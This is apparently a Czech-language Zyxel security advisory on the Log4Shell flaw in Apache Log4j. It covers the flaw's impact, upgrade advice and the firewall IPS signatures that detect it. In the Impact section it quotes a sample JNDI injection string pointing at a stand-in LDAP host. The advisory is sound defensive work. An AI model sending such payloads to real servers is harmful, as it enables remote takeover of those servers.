Guard against Log4Shell

20/12/2021 Ochrana před zranitelností Log4Shell

Zranitelnost v balíčku log4j

Log4j je open-source projekt, který se běžně používá k logování v programovacím jazyce JAVA. Bylo zjištěno, že do Log4j verzí 2.x.x až 2.14.x byl injektován vzdálený kód. (Nicméně nový exploit, konkrétně CVE-2021-45046, byl odhalen také v log4j verzi 2.15. Z tohoto důvodu doporučujeme přejít na verzi 2.17). Tento kód útočníkům umožňuje odeslat speciální příkaz, a tím snadno získat vzdálený shell (Log4shell).

Dopad

Vzhledem k rozšířenému používání balíčku log4j a k možnosti vzdáleného spuštění kódu bylo této zranitelnosti v systému CVSS přiřazeno nejvyšší skóre 10. V případě zranitelného serveru mohou útočníci do balíčku log4j zasílat příkazy (jako např. ${jndi:ldap:// example.com/a}) a získat shell, který jim umožní kontrolu nad napadeným serverem. Kvůli narušení zabezpečení může být hostitel využit jako bot nebo krypto-těžař nebo případně k zašifrování důležitých souborů pomocí ransomwaru.

Týká se tento problém bezpečnostních zařízení Zyxel?

Společnost Zyxel si je zranitelností v Apache Log4j, které spočívají ve vzdáleném spuštění kódu (RCE), vědoma a potvrzuje, že žádné z jejích bezpečnostních zařízení není touto zranitelností dotčeno [1]. Firewally Zyxel ATP/USG FLEX poskytují před tímto útokem vícevrstvou ochranu.

Snížení rizik

Na hostiteli: doporučujeme provést aktualizaci na nejnovější verzi Apache Log4j (>=2.17.0).

V síti:

- Kvůli snížení rizika útoku nepublikujte zranitelné aplikace na internetu, pokud to není naprosto nezbytné. Ke vzdálenému přístupu k aplikacím používejte VPN.

- Proveďte aktualizaci na nejnovější verzi podpisu IPS a poté pro ochranu vašeho hostitele zapněte funkci IPS. Pokud váš hostitel používá přenos SSL/TLS, doporučujeme kvůli důkladnější detekci zapnout také kontrolu SSL. Pokud útok směřuje ze škodlivé IP adresy, ochrání vás před ním reputační filtr IP adres.

- Z důvodu ochrany před útokem doporučujeme zapnout DNS filtr, URL filtr, filtr obsahu, antivirový program a sandboxing.

Bližší informace o ochraně od společnosti Zyxel:

Věnujte prosím pozornost informacím o podpisech. Zařízení řady ATP/USGFLEX: v4.0.x.20211217.0

V případě zranitelnosti CVE-2021-44228 se používají podpisy s ID 131026, 131027 a 131028.

V případě zranitelnosti CVE-2021-45046 se používají podpisy s ID 131029 a 131030. Podrobnosti >

Odkaz

[1] Bezpečnostní doporučení společnosti Zyxel k RCE zranitelnostem Apache Log4j